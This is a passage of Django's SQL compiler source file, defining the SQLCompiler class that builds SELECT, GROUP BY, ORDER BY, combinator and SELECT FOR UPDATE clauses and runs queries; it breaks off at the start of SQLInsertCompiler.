| 2020-02-11T23:47:55 | 2019-02-28T17:33:14 |
Python
|
UTF-8
|
Python
| false | false | 67,037 |
py
|
import collections
import functools
import re
import warnings
from itertools import chain
from django.core.exceptions import EmptyResultSet, FieldError
from django.db.models.constants import LOOKUP_SEP
from django.db.models.expressions import OrderBy, Random, RawSQL, Ref
from django.db.models.query_utils import QueryWrapper, select_related_descend
from django.db.models.sql.constants import (
CURSOR, GET_ITERATOR_CHUNK_SIZE, MULTI, NO_RESULTS, ORDER_DIR, SINGLE,
)
from django.db.models.sql.query import Query, get_order_dir
from django.db.transaction import TransactionManagementError
from django.db.utils import DatabaseError, NotSupportedError
from django.utils.deprecation import RemovedInDjango30Warning
from django.utils.inspect import func_supports_parameter
FORCE = object()
class SQLCompiler:
def __init__(self, query, connection, using):
self.query = query
self.connection = connection
self.using = using
self.quote_cache = {'*': '*'}
# The select, klass_info, and annotations are needed by QuerySet.iterator()
# these are set as a side-effect of executing the query. Note that we calculate
# separately a list of extra select columns needed for grammatical correctness
# of the query, but these columns are not included in self.select.
self.select = None
self.annotation_col_map = None
self.klass_info = None
self.ordering_parts = re.compile(r'(.*)\s(ASC|DESC)(.*)')
def setup_query(self):
if all(self.query.alias_refcount[a] == 0 for a in self.query.alias_map):
self.query.get_initial_alias()
self.select, self.klass_info, self.annotation_col_map = self.get_select()
self.col_count = len(self.select)
def pre_sql_setup(self):
"""
Do any necessary class setup immediately prior to producing SQL. This
is for things that can't necessarily be done in __init__ because we
might not have all the pieces in place at that time.
"""
self.setup_query()
order_by = self.get_order_by()
self.where, self.having = self.query.where.split_having()
extra_select = self.get_extra_select(order_by, self.select)
self.has_extra_select = bool(extra_select)
group_by = self.get_group_by(self.select + extra_select, order_by)
return extra_select, order_by, group_by
def get_group_by(self, select, order_by):
"""
Return a list of 2-tuples of form (sql, params).
The logic of what exactly the GROUP BY clause contains is hard
to describe in other words than "if it passes the test suite,
then it is correct".
"""
# Some examples:
# SomeModel.objects.annotate(Count('somecol'))
# GROUP BY: all fields of the model
#
# SomeModel.objects.values('name').annotate(Count('somecol'))
# GROUP BY: name
#
# SomeModel.objects.annotate(Count('somecol')).values('name')
# GROUP BY: all cols of the model
#
# SomeModel.objects.values('name', 'pk').annotate(Count('somecol')).values('pk')
# GROUP BY: name, pk
#
# SomeModel.objects.values('name').annotate(Count('somecol')).values('pk')
# GROUP BY: name, pk
#
# In fact, the self.query.group_by is the minimal set to GROUP BY. It
# can't be ever restricted to a smaller set, but additional columns in
# HAVING, ORDER BY, and SELECT clauses are added to it. Unfortunately
# the end result is that it is impossible to force the query to have
# a chosen GROUP BY clause - you can almost do this by using the form:
# .values(*wanted_cols).annotate(AnAggregate())
# but any later annotations, extra selects, values calls that
# refer some column outside of the wanted_cols, order_by, or even
# filter calls can alter the GROUP BY clause.
# The query.group_by is either None (no GROUP BY at all), True
# (group by select fields), or a list of expressions to be added
# to the group by.
if self.query.group_by is None:
return []
expressions = []
if self.query.group_by is not True:
# If the group by is set to a list (by .values() call most likely),
# then we need to add everything in it to the GROUP BY clause.
# Backwards compatibility hack for setting query.group_by. Remove
# when we have public API way of forcing the GROUP BY clause.
# Converts string references to expressions.
for expr in self.query.group_by:
if not hasattr(expr, 'as_sql'):
expressions.append(self.query.resolve_ref(expr))
else:
expressions.append(expr)
# Note that even if the group_by is set, it is only the minimal
# set to group by. So, we need to add cols in select, order_by, and
# having into the select in any case.
for expr, _, _ in select:
cols = expr.get_group_by_cols()
for col in cols:
expressions.append(col)
for expr, (sql, params, is_ref) in order_by:
# Skip References to the select clause, as all expressions in the
# select clause are already part of the group by.
if not expr.contains_aggregate and not is_ref:
expressions.extend(expr.get_source_expressions())
having_group_by = self.having.get_group_by_cols() if self.having else ()
for expr in having_group_by:
expressions.append(expr)
result = []
seen = set()
expressions = self.collapse_group_by(expressions, having_group_by)
for expr in expressions:
sql, params = self.compile(expr)
if (sql, tuple(params)) not in seen:
result.append((sql, params))
seen.add((sql, tuple(params)))
return result
def collapse_group_by(self, expressions, having):
# If the DB can group by primary key, then group by the primary key of
# query's main model. Note that for PostgreSQL the GROUP BY clause must
# include the primary key of every table, but for MySQL it is enough to
# have the main table's primary key.
if self.connection.features.allows_group_by_pk:
# Determine if the main model's primary key is in the query.
pk = None
for expr in expressions:
# Is this a reference to query's base table primary key? If the
# expression isn't a Col-like, then skip the expression.
if (getattr(expr, 'target', None) == self.query.model._meta.pk and
getattr(expr, 'alias', None) == self.query.base_table):
pk = expr
break
# If the main model's primary key is in the query, group by that
# field, HAVING expressions, and expressions associated with tables
# that don't have a primary key included in the grouped columns.
if pk:
pk_aliases = {
expr.alias for expr in expressions
if hasattr(expr, 'target') and expr.target.primary_key
}
expressions = [pk] + [
expr for expr in expressions
if expr in having or (
getattr(expr, 'alias', None) is not None and expr.alias not in pk_aliases
)
]
elif self.connection.features.allows_group_by_selected_pks:
# Filter out all expressions associated with a table's primary key
# present in the grouped columns. This is done by identifying all
# tables that have their primary key included in the grouped
# columns and removing non-primary key columns referring to them.
# Unmanaged models are excluded because they could be representing
# database views on which the optimization might not be allowed.
pks = {
expr for expr in expressions
if hasattr(expr, 'target') and expr.target.primary_key and expr.target.model._meta.managed
}
aliases = {expr.alias for expr in pks}
expressions = [
expr for expr in expressions if expr in pks or getattr(expr, 'alias', None) not in aliases
]
return expressions
def get_select(self):
"""
Return three values:
- a list of 3-tuples of (expression, (sql, params), alias)
- a klass_info structure,
- a dictionary of annotations
The (sql, params) is what the expression will produce, and alias is the
"AS alias" for the column (possibly None).
The klass_info structure contains the following information:
- The base model of the query.
- Which columns for that model are present in the query (by
position of the select clause).
- related_klass_infos: [f, klass_info] to descent into
The annotations is a dictionary of {'attname': column position} values.
"""
select = []
klass_info = None
annotations = {}
select_idx = 0
for alias, (sql, params) in self.query.extra_select.items():
annotations[alias] = select_idx
select.append((RawSQL(sql, params), alias))
select_idx += 1
assert not (self.query.select and self.query.default_cols)
if self.query.default_cols:
cols = self.get_default_columns()
else:
# self.query.select is a special case. These columns never go to
# any model.
cols = self.query.select
if cols:
select_list = []
for col in cols:
select_list.append(select_idx)
select.append((col, None))
select_idx += 1
klass_info = {
'model': self.query.model,
'select_fields': select_list,
}
for alias, annotation in self.query.annotation_select.items():
annotations[alias] = select_idx
select.append((annotation, alias))
select_idx += 1
if self.query.select_related:
related_klass_infos = self.get_related_selections(select)
klass_info['related_klass_infos'] = related_klass_infos
def get_select_from_parent(klass_info):
for ki in klass_info['related_klass_infos']:
if ki['from_parent']:
ki['select_fields'] = (klass_info['select_fields'] +
ki['select_fields'])
get_select_from_parent(ki)
get_select_from_parent(klass_info)
ret = []
for col, alias in select:
try:
sql, params = self.compile(col, select_format=True)
except EmptyResultSet:
# Select a predicate that's always False.
sql, params = '0', ()
ret.append((col, (sql, params), alias))
return ret, klass_info, annotations
def get_order_by(self):
"""
Return a list of 2-tuples of form (expr, (sql, params, is_ref)) for the
ORDER BY clause.
The order_by clause can alter the select clause (for example it
can add aliases to clauses that do not yet have one, or it can
add totally new select clauses).
"""
if self.query.extra_order_by:
ordering = self.query.extra_order_by
elif not self.query.default_ordering:
ordering = self.query.order_by
else:
ordering = (self.query.order_by or self.query.get_meta().ordering or [])
if self.query.standard_ordering:
asc, desc = ORDER_DIR['ASC']
else:
asc, desc = ORDER_DIR['DESC']
order_by = []
for field in ordering:
if hasattr(field, 'resolve_expression'):
if not isinstance(field, OrderBy):
field = field.asc()
if not self.query.standard_ordering:
field.reverse_ordering()
order_by.append((field, False))
continue
if field == '?': # random
order_by.append((OrderBy(Random()), False))
continue
col, order = get_order_dir(field, asc)
descending = order == 'DESC'
if col in self.query.annotation_select:
# Reference to expression in SELECT clause
order_by.append((
OrderBy(Ref(col, self.query.annotation_select[col]), descending=descending),
True))
continue
if col in self.query.annotations:
# References to an expression which is masked out of the SELECT clause
order_by.append((
OrderBy(self.query.annotations[col], descending=descending),
False))
continue
if '.' in field:
# This came in through an extra(order_by=...) addition. Pass it
# on verbatim.
table, col = col.split('.', 1)
order_by.append((
OrderBy(
RawSQL('%s.%s' % (self.quote_name_unless_alias(table), col), []),
descending=descending
), False))
continue
if not self.query._extra or col not in self.query._extra:
# 'col' is of the form 'field' or 'field1__field2' or
# '-field1__field2__field', etc.
order_by.extend(self.find_ordering_name(
field, self.query.get_meta(), default_order=asc))
else:
if col not in self.query.extra_select:
order_by.append((
OrderBy(RawSQL(*self.query.extra[col]), descending=descending),
False))
else:
order_by.append((
OrderBy(Ref(col, RawSQL(*self.query.extra[col])), descending=descending),
True))
result = []
seen = set()
for expr, is_ref in order_by:
if self.query.combinator:
src = expr.get_source_expressions()[0]
# Relabel order by columns to raw numbers if this is a combined
# query; necessary since the columns can't be referenced by the
# fully qualified name and the simple column names may collide.
for idx, (sel_expr, _, col_alias) in enumerate(self.select):
if is_ref and col_alias == src.refs:
src = src.source
elif col_alias:
continue
if src == sel_expr:
expr.set_source_expressions([RawSQL('%d' % (idx + 1), ())])
break
else:
raise DatabaseError('ORDER BY term does not match any column in the result set.')
resolved = expr.resolve_expression(
self.query, allow_joins=True, reuse=None)
sql, params = self.compile(resolved)
# Don't add the same column twice, but the order direction is
# not taken into account so we strip it. When this entire method
# is refactored into expressions, then we can check each part as we
# generate it.
without_ordering = self.ordering_parts.search(sql).group(1)
if (without_ordering, tuple(params)) in seen:
continue
seen.add((without_ordering, tuple(params)))
result.append((resolved, (sql, params, is_ref)))
return result
def get_extra_select(self, order_by, select):
extra_select = []
if self.query.distinct and not self.query.distinct_fields:
select_sql = [t[1] for t in select]
for expr, (sql, params, is_ref) in order_by:
without_ordering = self.ordering_parts.search(sql).group(1)
if not is_ref and (without_ordering, params) not in select_sql:
extra_select.append((expr, (without_ordering, params), None))
return extra_select
def quote_name_unless_alias(self, name):
"""
A wrapper around connection.ops.quote_name that doesn't quote aliases
for table names. This avoids problems with some SQL dialects that treat
quoted strings specially (e.g. PostgreSQL).
"""
if name in self.quote_cache:
return self.quote_cache[name]
if ((name in self.query.alias_map and name not in self.query.table_map) or
name in self.query.extra_select or (
name in self.query.external_aliases and name not in self.query.table_map)):
self.quote_cache[name] = name
return name
r = self.connection.ops.quote_name(name)
self.quote_cache[name] = r
return r
def compile(self, node, select_format=False):
vendor_impl = getattr(node, 'as_' + self.connection.vendor, None)
if vendor_impl:
sql, params = vendor_impl(self, self.connection)
else:
sql, params = node.as_sql(self, self.connection)
if select_format is FORCE or (select_format and not self.query.subquery):
return node.output_field.select_format(self, sql, params)
return sql, params
def get_combinator_sql(self, combinator, all):
features = self.connection.features
compilers = [
query.get_compiler(self.using, self.connection)
for query in self.query.combined_queries if not query.is_empty()
]
if not features.supports_slicing_ordering_in_compound:
for query, compiler in zip(self.query.combined_queries, compilers):
if query.low_mark or query.high_mark:
raise DatabaseError('LIMIT/OFFSET not allowed in subqueries of compound statements.')
if compiler.get_order_by():
raise DatabaseError('ORDER BY not allowed in subqueries of compound statements.')
parts = ()
for compiler in compilers:
try:
# If the columns list is limited, then all combined queries
# must have the same columns list. Set the selects defined on
# the query on all combined queries, if not already set.
if not compiler.query.values_select and self.query.values_select:
compiler.query.set_values((
*self.query.extra_select,
*self.query.values_select,
*self.query.annotation_select,
))
parts += (compiler.as_sql(),)
except EmptyResultSet:
# Omit the empty queryset with UNION and with DIFFERENCE if the
# first queryset is nonempty.
if combinator == 'union' or (combinator == 'difference' and parts):
continue
raise
if not parts:
raise EmptyResultSet
combinator_sql = self.connection.ops.set_operators[combinator]
if all and combinator == 'union':
combinator_sql += ' ALL'
braces = '({})' if features.supports_slicing_ordering_in_compound else '{}'
sql_parts, args_parts = zip(*((braces.format(sql), args) for sql, args in parts))
result = [' {} '.format(combinator_sql).join(sql_parts)]
params = []
for part in args_parts:
params.extend(part)
return result, params
def as_sql(self, with_limits=True, with_col_aliases=False):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
If 'with_limits' is False, any limit/offset information is not included
in the query.
"""
refcounts_before = self.query.alias_refcount.copy()
try:
extra_select, order_by, group_by = self.pre_sql_setup()
for_update_part = None
# Is a LIMIT/OFFSET clause needed?
with_limit_offset = with_limits and (self.query.high_mark is not None or self.query.low_mark)
combinator = self.query.combinator
features = self.connection.features
if combinator:
if not getattr(features, 'supports_select_{}'.format(combinator)):
raise NotSupportedError('{} is not supported on this database backend.'.format(combinator))
result, params = self.get_combinator_sql(combinator, self.query.combinator_all)
else:
distinct_fields, distinct_params = self.get_distinct()
# This must come after 'select', 'ordering', and 'distinct'
# (see docstring of get_from_clause() for details).
from_, f_params = self.get_from_clause()
where, w_params = self.compile(self.where) if self.where is not None else ("", [])
having, h_params = self.compile(self.having) if self.having is not None else ("", [])
result = ['SELECT']
params = []
if self.query.distinct:
distinct_result, distinct_params = self.connection.ops.distinct_sql(
distinct_fields,
distinct_params,
)
result += distinct_result
params += distinct_params
out_cols = []
col_idx = 1
for _, (s_sql, s_params), alias in self.select + extra_select:
if alias:
s_sql = '%s AS %s' % (s_sql, self.connection.ops.quote_name(alias))
elif with_col_aliases:
s_sql = '%s AS %s' % (s_sql, 'Col%d' % col_idx)
col_idx += 1
params.extend(s_params)
out_cols.append(s_sql)
result += [', '.join(out_cols), 'FROM', *from_]
params.extend(f_params)
if self.query.select_for_update and self.connection.features.has_select_for_update:
if self.connection.get_autocommit():
raise TransactionManagementError('select_for_update cannot be used outside of a transaction.')
if with_limit_offset and not self.connection.features.supports_select_for_update_with_limit:
raise NotSupportedError(
'LIMIT/OFFSET is not supported with '
'select_for_update on this database backend.'
)
nowait = self.query.select_for_update_nowait
skip_locked = self.query.select_for_update_skip_locked
of = self.query.select_for_update_of
# If it's a NOWAIT/SKIP LOCKED/OF query but the backend
# doesn't support it, raise NotSupportedError to prevent a
# possible deadlock.
if nowait and not self.connection.features.has_select_for_update_nowait:
raise NotSupportedError('NOWAIT is not supported on this database backend.')
elif skip_locked and not self.connection.features.has_select_for_update_skip_locked:
raise NotSupportedError('SKIP LOCKED is not supported on this database backend.')
elif of and not self.connection.features.has_select_for_update_of:
raise NotSupportedError('FOR UPDATE OF is not supported on this database backend.')
for_update_part = self.connection.ops.for_update_sql(
nowait=nowait,
skip_locked=skip_locked,
of=self.get_select_for_update_of_arguments(),
)
if for_update_part and self.connection.features.for_update_after_from:
result.append(for_update_part)
if where:
result.append('WHERE %s' % where)
params.extend(w_params)
grouping = []
for g_sql, g_params in group_by:
grouping.append(g_sql)
params.extend(g_params)
if grouping:
if distinct_fields:
raise NotImplementedError('annotate() + distinct(fields) is not implemented.')
order_by = order_by or self.connection.ops.force_no_ordering()
result.append('GROUP BY %s' % ', '.join(grouping))
if having:
result.append('HAVING %s' % having)
params.extend(h_params)
if self.query.explain_query:
result.insert(0, self.connection.ops.explain_query_prefix(
self.query.explain_format,
**self.query.explain_options
))
if order_by:
ordering = []
for _, (o_sql, o_params, _) in order_by:
ordering.append(o_sql)
params.extend(o_params)
result.append('ORDER BY %s' % ', '.join(ordering))
if with_limit_offset:
result.append(self.connection.ops.limit_offset_sql(self.query.low_mark, self.query.high_mark))
if for_update_part and not self.connection.features.for_update_after_from:
result.append(for_update_part)
if self.query.subquery and extra_select:
# If the query is used as a subquery, the extra selects would
# result in more columns than the left-hand side expression is
# expecting. This can happen when a subquery uses a combination
# of order_by() and distinct(), forcing the ordering expressions
# to be selected as well. Wrap the query in another subquery
# to exclude extraneous selects.
sub_selects = []
sub_params = []
for index, (select, _, alias) in enumerate(self.select, start=1):
if not alias and with_col_aliases:
alias = 'col%d' % index
if alias:
sub_selects.append("%s.%s" % (
self.connection.ops.quote_name('subquery'),
self.connection.ops.quote_name(alias),
))
else:
select_clone = select.relabeled_clone({select.alias: 'subquery'})
subselect, subparams = select_clone.as_sql(self, self.connection)
sub_selects.append(subselect)
sub_params.extend(subparams)
return 'SELECT %s FROM (%s) subquery' % (
', '.join(sub_selects),
' '.join(result),
), tuple(sub_params + params)
return ' '.join(result), tuple(params)
finally:
# Finally do cleanup - get rid of the joins we created above.
self.query.reset_refcounts(refcounts_before)
def get_default_columns(self, start_alias=None, opts=None, from_parent=None):
"""
Compute the default columns for selecting every field in the base
model. Will sometimes be called to pull in related models (e.g. via
select_related), in which case "opts" and "start_alias" will be given
to provide a starting point for the traversal.
Return a list of strings, quoted appropriately for use in SQL
directly, as well as a set of aliases used in the select statement (if
'as_pairs' is True, return a list of (alias, col_name) pairs instead
of strings as the first component and None as the second component).
"""
result = []
if opts is None:
opts = self.query.get_meta()
only_load = self.deferred_to_columns()
start_alias = start_alias or self.query.get_initial_alias()
# The 'seen_models' is used to optimize checking the needed parent
# alias for a given field. This also includes None -> start_alias to
# be used by local fields.
seen_models = {None: start_alias}
for field in opts.concrete_fields:
model = field.model._meta.concrete_model
# A proxy model will have a different model and concrete_model. We
# will assign None if the field belongs to this model.
if model == opts.model:
model = None
if from_parent and model is not None and issubclass(
from_parent._meta.concrete_model, model._meta.concrete_model):
# Avoid loading data for already loaded parents.
# We end up here in the case select_related() resolution
# proceeds from parent model to child model. In that case the
# parent model data is already present in the SELECT clause,
# and we want to avoid reloading the same data again.
continue
if field.model in only_load and field.attname not in only_load[field.model]:
continue
alias = self.query.join_parent_model(opts, model, start_alias,
seen_models)
column = field.get_col(alias)
result.append(column)
return result
def get_distinct(self):
"""
Return a quoted list of fields to use in DISTINCT ON part of the query.
This method can alter the tables in the query, and thus it must be
called before get_from_clause().
"""
result = []
params = []
opts = self.query.get_meta()
for name in self.query.distinct_fields:
parts = name.split(LOOKUP_SEP)
_, targets, alias, joins, path, _, transform_function = self._setup_joins(parts, opts, None)
targets, alias, _ = self.query.trim_joins(targets, joins, path)
for target in targets:
if name in self.query.annotation_select:
result.append(name)
else:
r, p = self.compile(transform_function(target, alias))
result.append(r)
params.append(p)
return result, params
def find_ordering_name(self, name, opts, alias=None, default_order='ASC',
already_seen=None):
"""
Return the table alias (the name might be ambiguous, the alias will
not be) and column name for ordering by the given 'name' parameter.
The 'name' is of the form 'field1__field2__...__fieldN'.
"""
name, order = get_order_dir(name, default_order)
descending = order == 'DESC'
pieces = name.split(LOOKUP_SEP)
field, targets, alias, joins, path, opts, transform_function = self._setup_joins(pieces, opts, alias)
# If we get to this point and the field is a relation to another model,
# append the default ordering for that model unless the attribute name
# of the field is specified.
if field.is_relation and opts.ordering and getattr(field, 'attname', None) != name:
# Firstly, avoid infinite loops.
already_seen = already_seen or set()
join_tuple = tuple(getattr(self.query.alias_map[j], 'join_cols', None) for j in joins)
if join_tuple in already_seen:
raise FieldError('Infinite loop caused by ordering.')
already_seen.add(join_tuple)
results = []
for item in opts.ordering:
results.extend(self.find_ordering_name(item, opts, alias,
order, already_seen))
return results
targets, alias, _ = self.query.trim_joins(targets, joins, path)
return [(OrderBy(transform_function(t, alias), descending=descending), False) for t in targets]
def _setup_joins(self, pieces, opts, alias):
"""
Helper method for get_order_by() and get_distinct().
get_ordering() and get_distinct() must produce same target columns on
same input, as the prefixes of get_ordering() and get_distinct() must
match. Executing SQL where this is not true is an error.
"""
alias = alias or self.query.get_initial_alias()
field, targets, opts, joins, path, transform_function = self.query.setup_joins(pieces, opts, alias)
alias = joins[-1]
return field, targets, alias, joins, path, opts, transform_function
def get_from_clause(self):
"""
Return a list of strings that are joined together to go after the
"FROM" part of the query, as well as a list any extra parameters that
need to be included. Subclasses, can override this to create a
from-clause via a "select".
This should only be called after any SQL construction methods that
might change the tables that are needed. This means the select columns,
ordering, and distinct must be done first.
"""
result = []
params = []
for alias in tuple(self.query.alias_map):
if not self.query.alias_refcount[alias]:
continue
try:
from_clause = self.query.alias_map[alias]
except KeyError:
# Extra tables can end up in self.tables, but not in the
# alias_map if they aren't in a join. That's OK. We skip them.
continue
clause_sql, clause_params = self.compile(from_clause)
result.append(clause_sql)
params.extend(clause_params)
for t in self.query.extra_tables:
alias, _ = self.query.table_alias(t)
# Only add the alias if it's not already present (the table_alias()
# call increments the refcount, so an alias refcount of one means
# this is the only reference).
if alias not in self.query.alias_map or self.query.alias_refcount[alias] == 1:
result.append(', %s' % self.quote_name_unless_alias(alias))
return result, params
def get_related_selections(self, select, opts=None, root_alias=None, cur_depth=1,
requested=None, restricted=None):
"""
Fill in the information needed for a select_related query. The current
depth is measured as the number of connections away from the root model
(for example, cur_depth=1 means we are looking at models with direct
connections to the root model).
"""
def _get_field_choices():
direct_choices = (f.name for f in opts.fields if f.is_relation)
reverse_choices = (
f.field.related_query_name()
for f in opts.related_objects if f.field.unique
)
return chain(direct_choices, reverse_choices, self.query._filtered_relations)
related_klass_infos = []
if not restricted and cur_depth > self.query.max_depth:
# We've recursed far enough; bail out.
return related_klass_infos
if not opts:
opts = self.query.get_meta()
root_alias = self.query.get_initial_alias()
only_load = self.query.get_loaded_field_names()
# Setup for the case when only particular related fields should be
# included in the related selection.
fields_found = set()
if requested is None:
restricted = isinstance(self.query.select_related, dict)
if restricted:
requested = self.query.select_related
def get_related_klass_infos(klass_info, related_klass_infos):
klass_info['related_klass_infos'] = related_klass_infos
for f in opts.fields:
field_model = f.model._meta.concrete_model
fields_found.add(f.name)
if restricted:
next = requested.get(f.name, {})
if not f.is_relation:
# If a non-related field is used like a relation,
# or if a single non-relational field is given.
if next or f.name in requested:
raise FieldError(
"Non-relational field given in select_related: '%s'. "
"Choices are: %s" % (
f.name,
", ".join(_get_field_choices()) or '(none)',
)
)
else:
next = False
if not select_related_descend(f, restricted, requested,
only_load.get(field_model)):
continue
klass_info = {
'model': f.remote_field.model,
'field': f,
'reverse': False,
'local_setter': f.set_cached_value,
'remote_setter': f.remote_field.set_cached_value if f.unique else lambda x, y: None,
'from_parent': False,
}
related_klass_infos.append(klass_info)
select_fields = []
_, _, _, joins, _, _ = self.query.setup_joins(
[f.name], opts, root_alias)
alias = joins[-1]
columns = self.get_default_columns(start_alias=alias, opts=f.remote_field.model._meta)
for col in columns:
select_fields.append(len(select))
select.append((col, None))
klass_info['select_fields'] = select_fields
next_klass_infos = self.get_related_selections(
select, f.remote_field.model._meta, alias, cur_depth + 1, next, restricted)
get_related_klass_infos(klass_info, next_klass_infos)
if restricted:
related_fields = [
(o.field, o.related_model)
for o in opts.related_objects
if o.field.unique and not o.many_to_many
]
for f, model in related_fields:
if not select_related_descend(f, restricted, requested,
only_load.get(model), reverse=True):
continue
related_field_name = f.related_query_name()
fields_found.add(related_field_name)
join_info = self.query.setup_joins([related_field_name], opts, root_alias)
alias = join_info.joins[-1]
from_parent = issubclass(model, opts.model) and model is not opts.model
klass_info = {
'model': model,
'field': f,
'reverse': True,
'local_setter': f.remote_field.set_cached_value,
'remote_setter': f.set_cached_value,
'from_parent': from_parent,
}
related_klass_infos.append(klass_info)
select_fields = []
columns = self.get_default_columns(
start_alias=alias, opts=model._meta, from_parent=opts.model)
for col in columns:
select_fields.append(len(select))
select.append((col, None))
klass_info['select_fields'] = select_fields
next = requested.get(f.related_query_name(), {})
next_klass_infos = self.get_related_selections(
select, model._meta, alias, cur_depth + 1,
next, restricted)
get_related_klass_infos(klass_info, next_klass_infos)
fields_not_found = set(requested).difference(fields_found)
for name in list(requested):
# Filtered relations work only on the topmost level.
if cur_depth > 1:
break
if name in self.query._filtered_relations:
fields_found.add(name)
f, _, join_opts, joins, _, _ = self.query.setup_joins([name], opts, root_alias)
model = join_opts.model
alias = joins[-1]
from_parent = issubclass(model, opts.model) and model is not opts.model
def local_setter(obj, from_obj):
f.remote_field.set_cached_value(from_obj, obj)
def remote_setter(obj, from_obj):
setattr(from_obj, name, obj)
klass_info = {
'model': model,
'field': f,
'reverse': True,
'local_setter': local_setter,
'remote_setter': remote_setter,
'from_parent': from_parent,
}
related_klass_infos.append(klass_info)
select_fields = []
columns = self.get_default_columns(
start_alias=alias, opts=model._meta,
from_parent=opts.model,
)
for col in columns:
select_fields.append(len(select))
select.append((col, None))
klass_info['select_fields'] = select_fields
next_requested = requested.get(name, {})
next_klass_infos = self.get_related_selections(
select, opts=model._meta, root_alias=alias,
cur_depth=cur_depth + 1, requested=next_requested,
restricted=restricted,
)
get_related_klass_infos(klass_info, next_klass_infos)
fields_not_found = set(requested).difference(fields_found)
if fields_not_found:
invalid_fields = ("'%s'" % s for s in fields_not_found)
raise FieldError(
'Invalid field name(s) given in select_related: %s. '
'Choices are: %s' % (
', '.join(invalid_fields),
', '.join(_get_field_choices()) or '(none)',
)
)
return related_klass_infos
def get_select_for_update_of_arguments(self):
"""
Return a quoted list of arguments for the SELECT FOR UPDATE OF part of
the query.
"""
def _get_field_choices():
"""Yield all allowed field paths in breadth-first search order."""
queue = collections.deque([(None, self.klass_info)])
while queue:
parent_path, klass_info = queue.popleft()
if parent_path is None:
path = []
yield 'self'
else:
field = klass_info['field']
if klass_info['reverse']:
field = field.remote_field
path = parent_path + [field.name]
yield LOOKUP_SEP.join(path)
queue.extend(
(path, klass_info)
for klass_info in klass_info.get('related_klass_infos', [])
)
result = []
invalid_names = []
for name in self.query.select_for_update_of:
parts = [] if name == 'self' else name.split(LOOKUP_SEP)
klass_info = self.klass_info
for part in parts:
for related_klass_info in klass_info.get('related_klass_infos', []):
field = related_klass_info['field']
if related_klass_info['reverse']:
field = field.remote_field
if field.name == part:
klass_info = related_klass_info
break
else:
klass_info = None
break
if klass_info is None:
invalid_names.append(name)
continue
select_index = klass_info['select_fields'][0]
col = self.select[select_index][0]
if self.connection.features.select_for_update_of_column:
result.append(self.compile(col)[0])
else:
result.append(self.quote_name_unless_alias(col.alias))
if invalid_names:
raise FieldError(
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: %s.' % (
', '.join(invalid_names),
', '.join(_get_field_choices()),
)
)
return result
def deferred_to_columns(self):
"""
Convert the self.deferred_loading data structure to mapping of table
names to sets of column names which are to be loaded. Return the
dictionary.
"""
columns = {}
self.query.deferred_to_data(columns, self.query.get_loaded_field_names_cb)
return columns
def get_converters(self, expressions):
converters = {}
for i, expression in enumerate(expressions):
if expression:
backend_converters = self.connection.ops.get_db_converters(expression)
field_converters = expression.get_db_converters(self.connection)
if backend_converters or field_converters:
convs = []
for conv in (backend_converters + field_converters):
if func_supports_parameter(conv, 'context'):
warnings.warn(
'Remove the context parameter from %s.%s(). Support for it '
'will be removed in Django 3.0.' % (
conv.__self__.__class__.__name__,
conv.__name__,
),
RemovedInDjango30Warning,
)
conv = functools.partial(conv, context={})
convs.append(conv)
converters[i] = (convs, expression)
return converters
def apply_converters(self, rows, converters):
connection = self.connection
converters = list(converters.items())
for row in map(list, rows):
for pos, (convs, expression) in converters:
value = row[pos]
for converter in convs:
value = converter(value, expression, connection)
row[pos] = value
yield row
def results_iter(self, results=None, tuple_expected=False, chunked_fetch=False,
chunk_size=GET_ITERATOR_CHUNK_SIZE):
"""Return an iterator over the results from executing this query."""
if results is None:
results = self.execute_sql(MULTI, chunked_fetch=chunked_fetch, chunk_size=chunk_size)
fields = [s[0] for s in self.select[0:self.col_count]]
converters = self.get_converters(fields)
rows = chain.from_iterable(results)
if converters:
rows = self.apply_converters(rows, converters)
if tuple_expected:
rows = map(tuple, rows)
return rows
def has_results(self):
"""
Backends (e.g. NoSQL) can override this in order to use optimized
versions of "query has any results."
"""
# This is always executed on a query clone, so we can modify self.query
self.query.add_extra({'a': 1}, None, None, None, None, None)
self.query.set_extra_mask(['a'])
return bool(self.execute_sql(SINGLE))
def execute_sql(self, result_type=MULTI, chunked_fetch=False, chunk_size=GET_ITERATOR_CHUNK_SIZE):
"""
Run the query against the database and return the result(s). The
return value is a single data item if result_type is SINGLE, or an
iterator over the results if the result_type is MULTI.
result_type is either MULTI (use fetchmany() to retrieve all rows),
SINGLE (only retrieve a single row), or None. In this last case, the
cursor is returned if any query is executed, since it's used by
subclasses such as InsertQuery). It's possible, however, that no query
is needed, as the filters describe an empty set. In that case, None is
returned, to avoid any unnecessary database interaction.
"""
result_type = result_type or NO_RESULTS
try:
sql, params = self.as_sql()
if not sql:
raise EmptyResultSet
except EmptyResultSet:
if result_type == MULTI:
return iter([])
else:
return
if chunked_fetch:
cursor = self.connection.chunked_cursor()
else:
cursor = self.connection.cursor()
try:
cursor.execute(sql, params)
except Exception:
# Might fail for server-side cursors (e.g. connection closed)
cursor.close()
raise
if result_type == CURSOR:
# Give the caller the cursor to process and close.
return cursor
if result_type == SINGLE:
try:
val = cursor.fetchone()
if val:
return val[0:self.col_count]
return val
finally:
# done with the cursor
cursor.close()
if result_type == NO_RESULTS:
cursor.close()
return
result = cursor_iter(
cursor, self.connection.features.empty_fetchmany_value,
self.col_count if self.has_extra_select else None,
chunk_size,
)
if not chunked_fetch and not self.connection.features.can_use_chunked_reads:
try:
# If we are using non-chunked reads, we return the same data
# structure as normally, but ensure it is all read into memory
# before going any further. Use chunked_fetch if requested.
return list(result)
finally:
# done with the cursor
cursor.close()
return result
def as_subquery_condition(self, alias, columns, compiler):
qn = compiler.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
for index, select_col in enumerate(self.query.select):
lhs_sql, lhs_params = self.compile(select_col)
rhs = '%s.%s' % (qn(alias), qn2(columns[index]))
self.query.where.add(
QueryWrapper('%s = %s' % (lhs_sql, rhs), lhs_params), 'AND')
sql, params = self.as_sql()
return 'EXISTS (%s)' % sql, params
def explain_query(self):
result = list(self.execute_sql())
# Some backends return 1 item tuples with strings, and others return
# tuples with integers and strings. Flatten them out into strings.
for row in result[0]:
if not isinstance(row, str):
yield ' '.join(str(c) for c in row)
else:
yield row
class SQLInsertCompiler(SQLCompiler):
return_id = False
def field_as_sql(self, field, val):
"""
Take a field and a value intended to be saved on that field, and
return placeholder SQL and accompanying params. Check for raw values,
expressions, and fields with get_placeholder() defined in that order.
When field is None, consider the value raw and use it as the
placeholder, with no corresponding parameters returned.
"""
